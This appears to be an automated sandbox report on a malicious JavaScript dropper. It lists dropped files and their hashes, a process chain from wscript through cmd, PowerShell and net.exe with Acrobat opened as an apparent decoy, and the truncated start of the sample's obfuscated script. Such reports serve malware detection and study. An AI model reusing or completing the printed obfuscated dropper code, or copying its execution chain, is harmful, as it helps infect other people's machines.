SHA-512: | 9F8DF9F389E70CA5943DA8D5EC4AA209D0689F6FFB7C649CAB39A0D25FCCE829C56F989FFCDDEE10F1AD4CEB56ADFFA63A7E679246B23645276A44840965C751 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.279838521867379 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXwGWcc2vnZiQ0YceoAvJf21rPeUkwRe9:YvXKXpWf2vczG+16Ukee9 |
MD5: | 27C845B9FD37905DE268324BDC1D1F31 |
SHA1: | F5572360CDC7590854C43A6866F341271C00667A |
SHA-256: | CDB95879C6AD44E1A7A9CD833D679B3D0E4DD2549C53B520BDF9E32C1EB226A4 |
SHA-512: | BBBD2CFCBBDEC7D816EB9EBFBC2B1322E67527A87D0B5A6AF58EDF6BB946CDD02E6F01C234EBD62F34D2AE532DCF9517596C004E62676DA9F8C09494FBEA709C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.659915133026393 |
Encrypted: | false |
SSDEEP: | 24:Yv6X4fZcamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSS9:Yv9QBgkDMUJUAh8cvME |
MD5: | D9301A7054E5A5FF0AF532766361D670 |
SHA1: | C21ED571378412EC61CD1D51F3E002B3DDDFAE0C |
SHA-256: | D6FD9F07172C0F393C039CC920381E4823750E287F0BC45B6CAEBD95E18662E7 |
SHA-512: | BF277D121326F3284745D27A8EB4A340EA9A7FF395691E80942C61220C799729C9033E7E15F3B535843E5B581762CC530092E13A326BECC85B09CE25CAD5216C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.25526816284489 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXwGWcc2vnZiQ0YceoAvJfshHHrPeUkwRe9:YvXKXpWf2vczGUUUkee9 |
MD5: | 8EFB5D442EDEA352C931A38983407801 |
SHA1: | 5AE328858E11DD4CF679AD10BD441CAC74C0F7CB |
SHA-256: | 8F3F4F05B715A2003F26233C8230CD8F24565A75EC07020181E8F87F33C1F643 |
SHA-512: | 3222911002165A463F5BFBBD0505DED7058246330914E2AF35A5AB93EFFFB754D21174D0433D9BDB52B3F2FEBA5D63001B8CAE746EB53B32DEA8929ECB7D8258 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.260235270145154 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXwGWcc2vnZiQ0YceoAvJTqgFCrPeUkwRe9:YvXKXpWf2vczGTq16Ukee9 |
MD5: | F95B73429D00F5F55CE48EEE045BB085 |
SHA1: | 7C2AD6F10949D3FEBAE3EF5ABC1BE2EBAE0400A4 |
SHA-256: | 3B52C2A99E8DAB0BBFA00AF934967234E0AB5770119ED04C870563898E560211 |
SHA-512: | 7986AD55C2B83F8A7647355D6E42E9159A479369BE2BD99F1EDEDAAF66A03A5DBACA87950281CE16AAC7BB65E3330EA4C2D90690C98D24BB38F178210AACD2F1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.136931603857877 |
Encrypted: | false |
SSDEEP: | 48:YKLEL0Qgm36/3T29OvilC1j/Ou+0Th9CRa:ZI0Qg66vT24v8u+6/CRa |
MD5: | FFAAB74AF5C1CD4803953E3F9C1AD02E |
SHA1: | 26E048D36575976F0B5149D5AD8869A363634FA9 |
SHA-256: | E8618E2F4FA16EAA7BC6C22E5103FC7534D2572374CC08D8A22A3159A663011E |
SHA-512: | 6EB84E4329B935C08EF4167139582CC92070D8AE988FA1F96D69219F6D8E9C81447F75515B42F092705A66594DD4C48100F144897DBA080313010F8B3028AC6E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.1456431291558686 |
Encrypted: | false |
SSDEEP: | 24:TLhx/XYKQvGJF7urs/zRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcm:TFl2GL7ms/nXc+XcGNFlRYIX2v3kuZ |
MD5: | FB20EC0F300395FF6F98D4071190C5A5 |
SHA1: | 7A633EB22487DA026611405975737B7A46003E9B |
SHA-256: | 36480EE4351D311A5D77E087E6C14C695AAE9F14AA4A8CCCE50306E803359771 |
SHA-512: | 87149C19A97B440D4D18D8B1B684B8E238FCDED1244738EBBFB98EB997C8B9D61575E34A68BADCEF2143428C80443A2809D05996D9E51A39498BC55884FD7E4D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.5518799342403635 |
Encrypted: | false |
SSDEEP: | 48:7M5S0wXc+XcGNFlRYIX2vXvqVl2GL7ms7:759Xc+XckFPYIX2vvaVms7 |
MD5: | 12AA9EA186B7B092ADAF0CC7C8221054 |
SHA1: | 436723A7955F710BC9EC353CD93E0A34294B20B7 |
SHA-256: | 991D6CFB75ADB619CF6BDFA1B13E923E71B98C6DA381E5C0003B0E8696CC2BA9 |
SHA-512: | BAECCFDD8DF717EB4668749E26E91733CB404761692341854D55DECEC5CA02E8A753AB794FFFB7432F75BEA963F0125D647C07EC6710EBD66CB207F421298CBB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgtCCVgtK0r7VJcKhYGhi0PGk8K8Yyu:6a6TZ44ADEtCCVg00rRlhj98K |
MD5: | 491FC2E09A75B7BC9A6267EA514BD328 |
SHA1: | D7DA39C389ACAF391224D377E7002F5A65DEF6E6 |
SHA-256: | 69BB3670665B2C125FE764DE3A44048F3454452FD9C9C81C21CB68A12C380FB5 |
SHA-512: | 0DE182F12BE8399AA5221D096DF336E07DBF3827B4989D50AEFB564C214FC982F0FC71CE408F7C5955738A6304D312A5BE92F7E5331C235DD8BC972723776BBD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllul3nqth:NllUa |
MD5: | 851531B4FD612B0BC7891B3F401A478F |
SHA1: | 483F0D1E71FB0F6EFF159AA96CC82422CF605FB3 |
SHA-256: | 383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F |
SHA-512: | A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.4953527754662135 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClsaUFYlYH:Qw946cPbiOxDlbYnuRK+bxFYlYH |
MD5: | 9C3401F15601ED062D00ECF966B584BE |
SHA1: | 6C24F362F30EA282A1A6A44572F21BBB90A3C46A |
SHA-256: | 90123F77807C08EE637FBCCF75952D06B3B07290F8BFDD650A3C27BD282D8919 |
SHA-512: | 833EB961EC1D67A414E6548796D9A36EE866275AB605958F323D4B0F0F4372EFC0E8C9903E03AF494D13BCDC78CDD18EA6E8ED38D55240955600DD860B42BAD3 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 21-54-04-178.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.338264912747007 |
Encrypted: | false |
SSDEEP: | 384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb |
MD5: | 128A51060103D95314048C2F32A15C66 |
SHA1: | EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB |
SHA-256: | 601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713 |
SHA-512: | 55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.331371471985596 |
Encrypted: | false |
SSDEEP: | 384:X646hnULPMRNM3tFt8tttw3yI27eKpEP9yCk/0HD9lKSbmecfN/8CTC6r2rmj4Cf:zoOvurx |
MD5: | 34ABCA3493A0886F12503F62706EF3B5 |
SHA1: | 1E1B4839A46F7B605E35FAD818735CB21F9521D0 |
SHA-256: | 9CE9BC7B969BA79C409A57C36F29F5CBF63AB63721C308A1823B9AB013B2BBA1 |
SHA-512: | 8FFF683C64280C5C3CB7401BF29A1D2DC840F64E497830D4C6D7BAA3F7AB5BFE997F694B01465288B85C4A92B59338C349B3FC78F6C58ADAF2F2FF7F069B9644 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.399783709015412 |
Encrypted: | false |
SSDEEP: | 192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbfWcb0IIycbzQs:V3fOCIdJDeVNIrQs |
MD5: | 6BC5837D304216DD2D0A4BD5A869B6EF |
SHA1: | AD0DCB170010B96627C6BB7FBFE9D5D5F9C6CD94 |
SHA-256: | 1C05E9899F3A08CBC2FB4A686EF62CA13E01E9D3D25E1D2165D8586D25D3BD9B |
SHA-512: | 89F4B66C79F8FAD929D3B58D8DB40A8A296F1C86C25E190A8040AC113E6B47B3883D90AA9D481C084B9FF5EBED5DBB6509746C505127D6038A8F9B5BEE3D30B9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/9wYIGNPQmeWL07oXGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:lwZG2XWLxXGZN3mlind9i4ufFXpAXkru |
MD5: | CDB0A9F62FD4871F0603FBBF1FE6BD06 |
SHA1: | C972A2B8E6E7CD72A156C1EAB8F5F31E76A7DA24 |
SHA-256: | 85BD3F2168D078DFF0ECEB670C3DC651E8797522C6A2921EC478EAD5A09E415F |
SHA-512: | 7FC3B110A45F9D518FEA45930B73F196FEE7DF472A17FB2CBB19A3BCBF5C78D439F68E2C615D8DACD5821EF60C1447112FB86431D768E28D9F08457563011F28 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/yowYIGNP4bdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oBGZd:twZG6b3mlind9i4ufFXpAXkrfUs0qWLa |
MD5: | 8D04FDC5022E491B91EC6B32F003430B |
SHA1: | 6619D46E06076B5669D4CC677D6D8F638189E46A |
SHA-256: | 7682C53053D66EF0B1A89335C88C4420226B10AFAC87A286E6E1A6BC795FEE61 |
SHA-512: | AA96FA56D3C5C4200BAA917D3091ADB1A5FAE7D534DD9C909D8B60AE13E902D6B71D42C2823319483414987E4B41079FA241B3D0A384EE4B281B63F834917E7D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:bWNh3P6+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:C3PDegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 59EE5E2FB56A099CAA8EDFD7AF821ED6 |
SHA1: | F5DC4F876768D57B69EC894ADE0A66E813BFED92 |
SHA-256: | E100AAAA4FB2B3D78E3B6475C3B48BE189C5A39F73CFC2D22423F2CE928D3E75 |
SHA-512: | 77A45C89F6019F92576D88AE67B59F9D6D36BA6FDC020419DAB55DBD8492BA97B3DAC18278EB0210F90758B3D643EA8DCF8EC2BD1481930A59B8BB515E7440FE |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.885502415958652 |
TrID: | |
File name: | 2322331617238881677.js |
File size: | 21'769 bytes |
MD5: | 9536f4d64aed9539859c5c489ce44a32 |
SHA1: | 2f1551e23028a353c4fdaf67ca7dd6c2e3473b9e |
SHA256: | 62af60f22d99fa2d2e8cef1979b407d1b1b4d0b43eb4d3acb705384fa8937f38 |
SHA512: | 854633852d6f499a796195a743f87bae2f2d3e9da382d0fd0b1805055ed93b8af458f1a96ca63fdf67beabfbd2f83e70ed895a77c5c6bf2a604e4991746fb8fb |
SSDEEP: | 384:fHwHU5mVeb2HVHwH5Tvy0t4ssk4kYuARlp7qnm0oh2jCqfYHIGj:PmVuRry0t4ssk4kYuARlpmjCHFj |
TLSH: | 14A221CC9D559121D4C49CF1229C18B3638492880E666EF938C96CB8AE5D3F9EDE3B74 |
File Content Preview: | function dbfwe(){mfnwhfw=[1031,3079,5127,4103,2055,3072];var gpqplyhya=this[wulwxiqp+wvfqm+jezsvjlnb+zeyxb+ozhtep+wbkcx+kkijnjor+ifuvy](this[fadikbi+bejhq+anffeeeoj+jezsvjlnb+uyijdad+wulwxiqp+ifuvy][azfjql+jezsvjlnb+ozhtep+wvfqm+ifuvy+ozhtep+rzcoqes+xxeab |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 21:53:54 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff719c80000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 21:53:54 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7a6260000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 21:53:55 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66e660000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 21:53:55 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6e3d50000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 21:54:00 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff651090000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 21:54:00 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7a6260000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 21:54:01 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff64c8d0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 21:54:01 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 21:54:01 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7403e0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 21:54:02 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function dbfwe() { |
|
1 | mfnwhfw = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var gpqplyhya = this[wulwxiqp + wvfqm + jezsvjlnb + zeyxb + ozhtep + wbkcx + kkijnjor + ifuvy] ( this[fadikbi + bejhq + anffeeeoj + jezsvjlnb + uyijdad + wulwxiqp + ifuvy][azfjql + jezsvjlnb + ozhtep + wvfqm + ifuvy + ozhtep + rzcoqes + xxeabi + ikvduzur + ozhtep + anffeeeoj + ifuvy] ( fadikbi + bejhq + anffeeeoj + jezsvjlnb + uyijdad + wulwxiqp + ifuvy + suvnn + bejhq + ymtho + ozhtep + lsmnde + lsmnde ) [gijqtcmml + ozhtep + omhaktih + gijqtcmml + ozhtep + wvfqm + nxqizoikd] ( nxmjoetz + dmijzo + mskwzs + bskmn + ydpgebv + azfjql + olzjkyi + gijqtcmml + gijqtcmml + mskwzs + bxfddsu + vmuxzj + ydpgebv + olzjkyi + bejhq + mskwzs + gijqtcmml + zvuqgw + azfjql + mknzydkd + kkijnjor + ifuvy + jezsvjlnb + mknzydkd + lsmnde + vfqtvjruf + vqoaw + wvfqm + kkijnjor + ozhtep + lsmnde + zvuqgw + wbkcx + kkijnjor + ifuvy + ozhtep + jezsvjlnb + kkijnjor + wvfqm + ifuvy + uyijdad + mknzydkd + kkijnjor + wvfqm + lsmnde + zvuqgw + bvmycytdy + mknzydkd + anffeeeoj + 